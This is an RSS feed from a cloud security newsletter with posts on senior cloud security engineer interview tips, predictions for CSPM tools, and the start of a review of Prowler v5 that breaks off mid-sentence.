<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Cloud Security Club</title>
    <description>Simplifying Cloud and Cloud-Native Security</description>
    
    <link>https://cloudsecurity.club/</link>
    <atom:link href="https://rss.beehiiv.com/feeds/ku90ZXKAu5.xml" rel="self"/>
    
    <lastBuildDate>Thu, 9 Jul 2026 22:39:26 +0000</lastBuildDate>
    <pubDate>Sat, 15 Mar 2025 12:04:16 +0000</pubDate>
    <atom:published>2025-03-15T12:04:16Z</atom:published>
    <atom:updated>2026-07-09T22:39:26Z</atom:updated>
    
    <copyright>Copyright 2026, Cloud Security Club</copyright>
    
    <image>
      <url>https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/publication/logo/62d8c32d-00c9-4146-8afd-a71509bc1bc7/65ba6793e4b00910b5ba380a.jpg</url>
      <title>Cloud Security Club</title>
      <link>https://cloudsecurity.club/</link>
    </image>
    
    <docs>https://www.rssboard.org/rss-specification</docs>
    <generator>beehiiv</generator>
    <language>en-us</language>
    <webMaster>support@beehiiv.com (Beehiiv Support)</webMaster>

      <item>
  <title>How to Succeed in Your Senior Cloud Security Engineer Interview</title>
  <description>Prepare for your next Senior Cloud Security Engineer interview with insider tips, common questions, and practical strategies that work.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3cb24925-b2bf-4c83-b81c-52fe9beaec92/Cloud_Security_Interviews.png" length="69376" type="image/png"/>
  <link>https://cloudsecurity.club/p/senior-cloud-security-interview</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/senior-cloud-security-interview</guid>
  <pubDate>Sat, 15 Mar 2025 12:04:16 +0000</pubDate>
  <atom:published>2025-03-15T12:04:16Z</atom:published>
    <dc:creator>Chandrapal Badshah</dc:creator>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:center;">If you prefer a video version of this content, you can <a class="link" href="https://www.youtube.com/watch?v=rIbZL-GFLGA&utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=how-to-succeed-in-your-senior-cloud-security-engineer-interview" target="_blank" rel="noopener noreferrer nofollow">watch it on YouTube</a>.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">I&#39;m a Senior Cloud Security Engineer who has been on both sides of the interview table - as a candidate and an interviewer. </p><p class="paragraph" style="text-align:left;">I want to share three interview tips (and one bonus tip) to help you succeed in <b>Senior Cloud Security Engineer interviews</b> and advance your career. </p><p class="paragraph" style="text-align:left;">Use these tips not just to crack the interview, but to become a better cloud security engineer.</p><h3 class="heading" style="text-align:left;" id="tip-1-know-what-you-wrote-on-your-r">Tip 1: Know What You Wrote On Your Resume</h3><p class="paragraph" style="text-align:left;">Know your resume. </p><p class="paragraph" style="text-align:left;">I&#39;ve seen many candidates who don&#39;t know what they put on their resume. This happens in two ways:</p><ol start="1"><li><p class="paragraph" style="text-align:left;">Candidates don’t know what they wrote on their resume because they fed it to an AI tool that added keywords from the job description (to trick HR screening).</p></li><li><p class="paragraph" style="text-align:left;">Candidates exaggerate or fake their cloud security experience on resumes (ex: Least Privilege, Zero Trust Security, etc. while all they did was fix Access Analyzer findings).</p></li></ol><p class="paragraph" style="text-align:left;">Don&#39;t do this! </p><p class="paragraph" style="text-align:left;">Before applying or interviewing, at least review your resume if you fed it to an AI SaaS.</p><p class="paragraph" style="text-align:left;">If you faked your experience, interviewers can detect it by asking more detailed questions.</p><p class="paragraph" style="text-align:left;">“<i>I have no choice but the above. I didn’t find an alternative.</i>” </p><p class="paragraph" style="text-align:left;">Well, you have a better solution.</p><p class="paragraph" style="text-align:left;">If you lack hands-on experience, get some. </p><p class="paragraph" style="text-align:left;"><b>Do a project on your own time. Solve a cloud security issue you encountered. Contribute to open source. </b></p><p class="paragraph" style="text-align:left;">Here are some ideas:</p><ul><li><p class="paragraph" style="text-align:left;">Create infrastructure using IaC</p></li><li><p class="paragraph" style="text-align:left;">Setup CI/CD pipelines to scan IaC files and deploy to cloud</p></li><li><p class="paragraph" style="text-align:left;">Spin up vulnerable cloud projects and fix the issues</p></li><li><p class="paragraph" style="text-align:left;">Deploy a cloud honeypot in the cloud and monitor the attacks</p></li><li><p class="paragraph" style="text-align:left;">Contribute to a popular cloud security open source project (like Prowler)</p></li><li><p class="paragraph" style="text-align:left;">Build a simple cloud security application, add WAF and find the </p></li></ul><p class="paragraph" style="text-align:left;">The key is to have something tangible to discuss in the interview. This will demonstrate your genuine interest and practical skills in cloud security. </p><p class="paragraph" style="text-align:left;">Don&#39;t claim skills you lack. </p><p class="paragraph" style="text-align:left;">One or two rounds of technical interviews will reveal the candidates’ skills.</p><p class="paragraph" style="text-align:left;">Before any interview, create a &quot;cheat sheet&quot; of your accomplishments, failures, and learnings related to cloud security. Include:</p><ul><li><p class="paragraph" style="text-align:left;">Contextual cloud security issues you mitigated and how</p></li><li><p class="paragraph" style="text-align:left;">Automation tools you built and why you chose them over OSS/Commercial.</p></li><li><p class="paragraph" style="text-align:left;">How did you collaborate with DevOps and infra teams on security?</p></li><li><p class="paragraph" style="text-align:left;">Implemented security process improvements</p></li><li><p class="paragraph" style="text-align:left;">Criteria used to evaluate tools/services</p></li></ul><p class="paragraph" style="text-align:left;">Having these concrete examples in mind will help you significantly during interviews.</p><p class="paragraph" style="text-align:left;">Sample interview questions to prepare for:</p><ul><li><p class="paragraph" style="text-align:left;">Tell me about a project you did in the past and what you learned from it?</p></li><li><p class="paragraph" style="text-align:left;">What programming languages are you familiar with? How did you use them with your previous automations?</p></li></ul><h3 class="heading" style="text-align:left;" id="tip-2-get-practical-hands-on-experi">Tip 2: Get Practical, Hands-On Experience</h3><p class="paragraph" style="text-align:left;">Second, get practical. </p><p class="paragraph" style="text-align:left;">For a senior role, you need in-depth, hands-on knowledge of the cloud platform. You can&#39;t just memorize concepts; you must understand how things work in the cloud.</p><p class="paragraph" style="text-align:left;">If your job doesn&#39;t let you work deeply with the cloud, create that opportunity yourself. Spin up your own accounts and resources. Build a project. You need that real-world foundation.</p><p class="paragraph" style="text-align:left;">The key difference between Cloud Security Analysts and Cloud Security Engineers is <b>understanding the cloud platform, not just cloud security tools</b>. </p><p class="paragraph" style="text-align:left;">You need to know:</p><ul><li><p class="paragraph" style="text-align:left;">Creating secure VPC networks</p></li><li><p class="paragraph" style="text-align:left;">How do IAM roles & policies work in practice?</p></li><li><p class="paragraph" style="text-align:left;">Nuances of different services&#39; security controls</p></li><li><p class="paragraph" style="text-align:left;">Common misconfigurations and prevention methods</p></li></ul><p class="paragraph" style="text-align:left;">Don&#39;t rely on tools to flag issues. Understand the &quot;why&quot; behind best practices on a deep technical level.</p><p class="paragraph" style="text-align:left;">Sample interview questions to prepare for:</p><ul><li><p class="paragraph" style="text-align:left;">If you attach a security group allowing port 22 but a NACL denying it, what will be the end result?</p></li><li><p class="paragraph" style="text-align:left;">What risk does IMDSv2 mitigate?</p></li><li><p class="paragraph" style="text-align:left;">What compensating controls could you use if best practices (like IMDSv2) can&#39;t be implemented? </p></li></ul><h3 class="heading" style="text-align:left;" id="tip-3-expect-strategic-open-ended-q">Tip 3: Expect Strategic, Open-Ended Questions</h3><p class="paragraph" style="text-align:left;">Third, expect abstract questions. </p><p class="paragraph" style="text-align:left;">For senior-level roles, interviewers go beyond technical basics. They want to explore the breadth and depth of your strategic security thinking.</p><p class="paragraph" style="text-align:left;">Interviews ask open-ended questions like:</p><ul><li><p class="paragraph" style="text-align:left;">How to secure cloud environments?</p></li><li><p class="paragraph" style="text-align:left;">How to secure applications that developers deploy to Kubernetes?</p></li><li><p class="paragraph" style="text-align:left;">If you find a lot of attacks on your web applications, how are you going to protect against it?</p></li></ul><p class="paragraph" style="text-align:left;">Let me spill the beans.</p><p class="paragraph" style="text-align:left;">There&#39;s no one right answer. </p><p class="paragraph" style="text-align:left;"><b>Interviewers want to see how you approach complex challenges. </b></p><p class="paragraph" style="text-align:left;">Do you jump to a solution (like recommending AWS security services), or thoughtfully consider the context?</p><p class="paragraph" style="text-align:left;">Before proposing a solution, get more context. Ask:</p><ul><li><p class="paragraph" style="text-align:left;">Business overview</p></li><li><p class="paragraph" style="text-align:left;">Deployment processes</p></li><li><p class="paragraph" style="text-align:left;">Team structure and culture</p></li><li><p class="paragraph" style="text-align:left;">Current cloud architecture & scale</p></li><li><p class="paragraph" style="text-align:left;">Security and compliance requirements</p></li></ul><p class="paragraph" style="text-align:left;">There are always trade-offs. They want to see that you understand and can design an approach that balances risk, usability, and cost based on the situation. </p><h3 class="heading" style="text-align:left;" id="bonus-tip-think-out-loud">Bonus Tip: Think Out Loud!</h3><p class="paragraph" style="text-align:left;">This is key for those strategic, abstract questions.</p><p class="paragraph" style="text-align:left;">Don&#39;t just think quietly to yourself, trying to formulate the &quot;perfect&quot; answer. Walk the interviewer through your analysis in real-time. Explain the factors you&#39;re considering, even if it feels obvious.</p><p class="paragraph" style="text-align:left;">What seems basic to you could be insightful to them. Talking through your logic helps the interviewer understand your thought process.</p><p class="paragraph" style="text-align:left;">Thinking aloud gives the interviewer opportunities to provide prompts or hints if needed.</p><p class="paragraph" style="text-align:left;">While answering the open-ended question “How to secure applications deployed to Kubernetes?”, I missed discussing network security controls. The interview prompted by asking “What if there’s a DDoS attack?”, which helped me cover network controls in my solution.</p><h3 class="heading" style="text-align:left;" id="putting-it-all-together">Putting It All Together</h3><ul><li><p class="paragraph" style="text-align:left;">Don’t fake your resume.</p></li><li><p class="paragraph" style="text-align:left;">Create a cheatsheet to remember your past progress.</p></li><li><p class="paragraph" style="text-align:left;">Focus on gaining practical cloud skills, not just using cloud security tools.</p></li><li><p class="paragraph" style="text-align:left;">Hands-on experience helps you understand actual cloud security risks and how to prevent or mitigate them.</p></li><li><p class="paragraph" style="text-align:left;">Before answering abstract questions, get more context.</p></li><li><p class="paragraph" style="text-align:left;">Think out loud and explain your thought process before concluding.</p></li></ul><p class="paragraph" style="text-align:left;">I hope these tips help guide you to the next level in your career. They&#39;ve gotten me to where I am today. </p><p class="paragraph" style="text-align:left;">If you have any other questions, <a class="link" href="https://topmate.io/chandrapal/1299363?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=how-to-succeed-in-your-senior-cloud-security-engineer-interview" target="_blank" rel="noopener noreferrer nofollow">I&#39;m happy to discuss further</a>.</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=64bbfba1-0697-4080-910f-fd5ccbd60e63&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>The Future of CSPMs</title>
  <description>What could it be in 3 years?</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/594c1ec4-cb18-4636-ad1b-2501a7d58fc7/Future_of_CSPMs.png" length="24807" type="image/png"/>
  <link>https://cloudsecurity.club/p/the-future-of-cspms</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/the-future-of-cspms</guid>
  <pubDate>Mon, 27 Jan 2025 13:00:00 +0000</pubDate>
  <atom:published>2025-01-27T13:00:00Z</atom:published>
    <dc:creator>Chandrapal Badshah</dc:creator>
    <category><![CDATA[Cspm]]></category>
    <category><![CDATA[Aws]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">I&#39;ve been asking myself this question for a few months now.</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">I feel the CSPM space is saturated.</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">Almost all Cloud Security Posture Management (CSPM) tools (open source & commercial) have </span><span style="color:rgb(14, 16, 26);"><a class="link" href="https://cloudsecurity.club/p/5minute-cspm-evaluation-hack?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" target="_blank" rel="noopener noreferrer nofollow">similar capabilities</a></span><span style="color:rgb(14, 16, 26);">. The differentiating factor is add-ons like commercial support, near real-time detection, neat UI, and intuitive output with misconfigurations represented in graphs.</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">Will the commercial CSPM vendors keep the minimum number of developers to maintain the product and fire the rest?</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">Will there be no new features besides periodic UI/UX changes?</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">(Spoiler alert: I don&#39;t think so)</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">After spending considerable time with CSPMs, I predict 3 things that would happen in the CSPM space (in the next 3 years or until Gartner replaces it with another jargon - whichever comes first.)</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);"><i><b>Note:</b></i></span><span style="color:rgb(14, 16, 26);"><i> These are my personal views and predictions. I&#39;ll probably post in 2028, reviewing if my predictions were correct and what I missed.</i></span></p><h1 class="heading" style="text-align:left;" id="what-do-csp-ms-do"><span style="color:rgb(14, 16, 26);">What do CSPMs do?</span></h1><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">Refer to Gartner&#39;s definition of CSPM tools:</span></p><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">CSPM consists of offerings that continuously manage IaaS and PaaS security posture through </span><span style="color:rgb(14, 16, 26);"><b>prevention</b></span><span style="color:rgb(14, 16, 26);">, </span><span style="color:rgb(14, 16, 26);"><b>detection</b></span><span style="color:rgb(14, 16, 26);">, and </span><span style="color:rgb(14, 16, 26);"><b>response to cloud infrastructure risks</b></span><span style="color:rgb(14, 16, 26);">. The core of CSPM applies common frameworks, regulatory requirements, and enterprise policies to proactively and reactively discover and assess risk/trust of cloud services configuration and security settings. If an issue is identified, </span><span style="color:rgb(14, 16, 26);"><b>remediation options</b></span><span style="color:rgb(14, 16, 26);"> (automated or human-driven) are provided.</span></p><figcaption class="blockquote__byline"><a class="link" href="https://www.gartner.com/en/information-technology/glossary/cloud-security-posture-management?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" target="_blank" rel="noopener noreferrer nofollow">Gartner</a></figcaption></blockquote></div><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">On a high level, CSPMs:</span></p><ul><li><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">Maintain Asset Inventory</span></p></li><li><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">Detect configuration issues</span></p><ul><li><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">Missing security best practices</span></p></li><li><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">Cloud service misconfigurations that can lead to security incidents</span></p></li></ul></li></ul><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">These tools provide remediation steps and automation to prevent, detect, and respond to issues in the future.</span></p><h1 class="heading" style="text-align:left;" id="will-csp-ms-still-exist-in-the-near"><span style="color:rgb(14, 16, 26);">Will CSPMs still exist in the near future?</span></h1><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);"><b>They will continue to exist. I&#39;m confident.</b></span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">Fresh grads join the workforce. New ideas and startups emerge.</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">What&#39;s a better place to deploy your MVP than cloud platforms, given the incentives and credits they offer to startups.</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">And, what solution mitigates common security issues in cloud platforms that lead to breaches?</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">CSPMs. Unarguably.</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">The CSPM segment will continue to exist.</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);"><i>“Okay, my friend. Won’t CNAPPs replace CSPMs?”</i></span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">I don&#39;t think so. The base assumption for using CNAPP solutions is that there&#39;s a security team to manage the tool. Many companies and funded startups don&#39;t have security teams or even a one-person security team.</span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">CSPMs balance between no cloud security and a full-fledged CNAPP tool. </span></p><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">Companies whose security teams have been using CSPM for some time and got their internal processes sorted (like Devs and DevOps fix bugs within SLA) might aim to get a CNAPP tool to level up their cloud security. In those cases, CNAPP would replace CSPM tools.</span></p><h1 class="heading" style="text-align:left;" id="how-will-csp-ms-evolve">How will CSPMs evolve?</h1><h2 class="heading" style="text-align:left;" id="increases-coverage-to-include-more-">Increases coverage to include more services</h2><p class="paragraph" style="text-align:left;">Currently, CSPMs don&#39;t cover all services in supported cloud providers, focusing on the most commonly used ones. </p><p class="paragraph" style="text-align:left;">AWS Config, a native CSPM service (when used alongside Amazon SecurityHub), doesn&#39;t support all AWS services and has <a class="link" href="https://docs.aws.amazon.com/config/latest/developerguide/what-is-resource-config-coverage.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" target="_blank" rel="noopener noreferrer nofollow">different resource coverage across regions</a>. </p><p class="paragraph" style="text-align:left;">In the near future, CSPMs (and Cloud Native CSPM services) will stabilize across regions and increase the coverage of other existing services. Then, there&#39;s the development of new services and features among cloud providers.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/459bb719-deab-416b-bb9c-5f1de4183c1e/image.png?t=1737960537"/><div class="image__source"><span class="image__source_text"><p>Growth Cycle of CSPMs</p></span></div></div><p class="paragraph" style="text-align:left;">So, as long as Cloud Providers keep shipping new services and features, CSPMs will keep adding them to the checklist.</p><p class="paragraph" style="text-align:left;"><b>Note:</b> If new regulatory frameworks involving cloud platforms emerge or if there are changes to existing ones, CSPMs will pick up.</p><h2 class="heading" style="text-align:left;" id="increases-coverage-to-include-niche">Increases coverage to include niche cloud providers</h2><p class="paragraph" style="text-align:left;">Major cloud providers are costly. If you disagree, check the <a class="link" href="https://getdeploying.com/reference/data-egress?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" target="_blank" rel="noopener noreferrer nofollow">data egress fees</a> of AWS, GCP, and Azure to begin with.</p><p class="paragraph" style="text-align:left;">Good number of startups and companies using cloud platforms, especially those running containerized workloads in production, are switching/planning to switch to other cloud providers offering cheaper resources and/or private data centers.</p><p class="paragraph" style="text-align:left;">Migrating to cloud platforms like <a class="link" href="https://www.oracle.com/cloud/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" target="_blank" rel="noopener noreferrer nofollow">Oracle Cloud</a>, <a class="link" href="https://www.alibabacloud.com/en?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" target="_blank" rel="noopener noreferrer nofollow">Alibaba Cloud</a>, etc.</p><p class="paragraph" style="text-align:left;"><i>Cloud-native companies can see a considerable price reduction after migration. Companies can use a fraction of the saved costs to hire engineers to develop missing capabilities or workarounds for the new cloud platform.</i></p><p class="paragraph" style="text-align:left;">Other players (like <a class="link" href="https://www.linode.com/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" target="_blank" rel="noopener noreferrer nofollow">Linode</a> and <a class="link" href="https://www.cloudflare.com/developer-platform/products/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" target="_blank" rel="noopener noreferrer nofollow">Cloudflare</a>) could start marketing themselves as cloud platforms and better alternatives to major cloud platforms for certain usecases. (I also predict Cloudflare&#39;s Developer services will become a niche cloud platform with a customer base for Workers, R2, and AI services. 🙂)</p><p class="paragraph" style="text-align:left;">So, CSPMs will cover other cloud platforms and possibly private cloud/data centers where security issues are just a misconfiguration away.</p><h2 class="heading" style="text-align:left;" id="niche-commercial-cspm-players-emerg">Niche commercial CSPM players emerge</h2><p class="paragraph" style="text-align:left;">While the core functionality remains the configuration checks, the commercial CSPM tools might cater to specific audience.</p><p class="paragraph" style="text-align:left;">For example, <a class="link" href="https://www.linkedin.com/in/akashm/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" target="_blank" rel="noopener noreferrer nofollow">Akash Mahajan</a>’s startup, <a class="link" href="https://kloudle.com/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" target="_blank" rel="noopener noreferrer nofollow">Kloudle</a>, helps Developers and DevOps teams to secure their cloud.</p><p class="paragraph" style="text-align:left;">Similar CSPM startups will emerge.</p><p class="paragraph" style="text-align:left;">Such CSPMs might focus on one or few service types (like Serverless, GenAI, etc.), do it slightly better than the competition, and grow further.</p><p class="paragraph" style="text-align:left;">So, yeah. These are my three predictions for CSPMs in the near future. Let&#39;s see how things pan out.</p><hr class="content_break"><div class="section" style="background-color:transparent;margin:0.0px 0.0px 0.0px 0.0px;padding:0.0px 0.0px 0.0px 0.0px;"><p class="paragraph" style="text-align:left;">While CSPM solutions are readily available, many startups struggle with effectively operationalizing them for maximum security coverage.</p><p class="paragraph" style="text-align:left;">Ready to optimize your cloud security posture?</p></div><div class="section" style="background-color:transparent;margin:0.0px 0.0px 0.0px 0.0px;padding:0.0px 0.0px 0.0px 0.0px;"><div class="image"><a class="image__link" href="https://cal.com/badshah/discovery?user=badshah&utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" rel="noopener" target="_blank"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c4588309-d462-4ac4-a9e1-133a96c1d7f2/image.png?t=1737962105"/></a><div class="image__source"><a class="image__source_link" href="https://cal.com/badshah/discovery?user=badshah&utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=the-future-of-cspms" rel="noopener" target="_blank"><span class="image__source_text"><p>Let’s Connect</p></span></a></div></div></div></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=b8bccc7e-9ea1-40e5-bf67-69f70beb896c&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>What&#39;s New in Prowler v5</title>
  <description>From CLI Tool to Cloud Security Platform</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1b549bf9-fbec-4b62-83db-c248db44f5b1/Prowler_v5.png" length="167130" type="image/png"/>
  <link>https://cloudsecurity.club/p/whats-new-in-prowler-v5</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/whats-new-in-prowler-v5</guid>
  <pubDate>Wed, 15 Jan 2025 11:00:00 +0000</pubDate>
  <atom:published>2025-01-15T11:00:00Z</atom:published>
    <dc:creator>Chandrapal Badshah</dc:creator>
    <category><![CDATA[Cspm]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">I&#39;ve been using Prowler for a few years now. It&#39;s my <a class="link" href="https://cloudsecurity.club/p/5minute-cspm-evaluation-hack?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=what-s-new-in-prowler-v5" target="_blank" rel="noopener noreferrer nofollow">go-to open-source tool</a> for quick cloud security audits.</p><p class="paragraph" style="text-align:left;">A few months ago, <a class="link" href="https://github.com/prowler-cloud/prowler/releases/tag/5.0.0?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=what-s-new-in-prowler-v5" target="_blank" rel="noopener noreferrer nofollow">Prowler released v5</a> (codename <b>Powerslave</b>) at AWS re:Invent. The new dashboard in the release blog looked cool. However, I was busy with my LLM experiments.</p><p class="paragraph" style="text-align:left;">Last week, I had time to play around with the latest Prowler release. Here&#39;s my analysis.</p><p class="paragraph" style="text-align:left;">To summarize Prowler v5, <i>it&#39;s Prowler&#39;s big leap from being an open-source CSPM tool to a self-hostable open-source CSPM platform</i>.</p><p class="paragraph" style="text-align:left;">It has structured its code a bit. It has a much fancier dashboard as part of the Prowler App. It also exposes APIs so you can access Prowler App programmatically.</p><p class="paragraph" style="text-align:left;">But before we dive deeper, let&#39;s look at some pain points that Prowler App in v5 solves.</p><h2 class="heading" style="text-align:left;" id="limitations-with-the-predecessor-v-">Limitations with the predecessor (v4)</h2><h3 class="heading" style="text-align:left;" id="minimal-dashboard">Minimal Dashboard</h3><p class="paragraph" style="text-align:left;">Prowler v4 has a minimal dashboard that you can spin up using the command <code>prowler dashboard</code>.</p><p class="paragraph" style="text-align:left;"><i>(Just FYI, the Prowler dashboard feature is still available in v5)</i></p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3cd47283-d5b1-41e8-9bfd-c47cad981abf/image.png?t=1736924165"/><div class="image__source"><span class="image__source_text"><p>Prowler Dashboard</p></span></div></div><p class="paragraph" style="text-align:left;">It&#39;s better than having no dashboard at all. However, the minimal dashboard is more of a temporary HTTP server that can quickly visualize findings than a full-fledged standalone web server.</p><p class="paragraph" style="text-align:left;">It displays the findings from the saved CSV files from previous scans.</p><p class="paragraph" style="text-align:left;">One thing to note is that the dashboard doesn&#39;t have any authentication. So, even if you write a wrapper on top of the Prowler dashboard to host it as a server, then be careful - it might be a single misconfiguration away from becoming publicly accessible to the internet.</p><h3 class="heading" style="text-align:left;" id="periodic-scans-tracking-changes">Periodic Scans & Tracking Changes</h3><p class="paragraph" style="text-align:left;">Out of the box, v4 doesn&#39;t support periodic scans. To achieve it, you must create a Linux cron or something similar.</p><p class="paragraph" style="text-align:left;">If you have set it up, congrats. Now comes the operational part.</p><p class="paragraph" style="text-align:left;">With periodic scanning in place, you need at least periodic validation of these findings. Now,</p><ul><li><p class="paragraph" style="text-align:left;">How do you know the diff between two scans? </p></li><li><p class="paragraph" style="text-align:left;">How do you know which findings got closed and which popped up?</p></li><li><p class="paragraph" style="text-align:left;">How do you only send alerts to your Slack/Microsoft Teams when new issues are detected?</p></li></ul><p class="paragraph" style="text-align:left;">It&#39;s tricky. </p><p class="paragraph" style="text-align:left;">You need to write custom scripts to achieve those tasks. </p><p class="paragraph" style="text-align:left;">If you don&#39;t want to write custom scripts, you can achieve it by connecting Prowler to AWS Security Hub and integrating AWS Chatbot to alert new findings on Slack/Microsoft Teams. I&#39;ve described the process <a class="link" href="https://courses.cloudsecurity.club/courses/Securing-AWS-Strategies-for-Lean-Teams-from-Chandrapal-Badshah-666415ee3a16ef700a69c1c5?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=what-s-new-in-prowler-v5" target="_blank" rel="noopener noreferrer nofollow">in my course</a>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/d4c38937-413f-4888-b016-18142cbc7271/image.png?t=1736924295"/><div class="image__source"><span class="image__source_text"><p>Slide from my course on sending Prowler alerts to Security Hub</p></span></div></div><p class="paragraph" style="text-align:left;">Again, using Security Hub solely for detecting and alerting on the diff purpose might not be very appropriate.</p><h2 class="heading" style="text-align:left;" id="welcoming-powerslave-v-5">Welcoming Powerslave (v5)</h2><p class="paragraph" style="text-align:left;">Prowler v5 tackles both the above limitations using the Prowler App - a full-fledged CSPM platform, in my opinion.</p><p class="paragraph" style="text-align:left;"><i>(Note: If you stick with the v5 CLI, the problems mentioned earlier 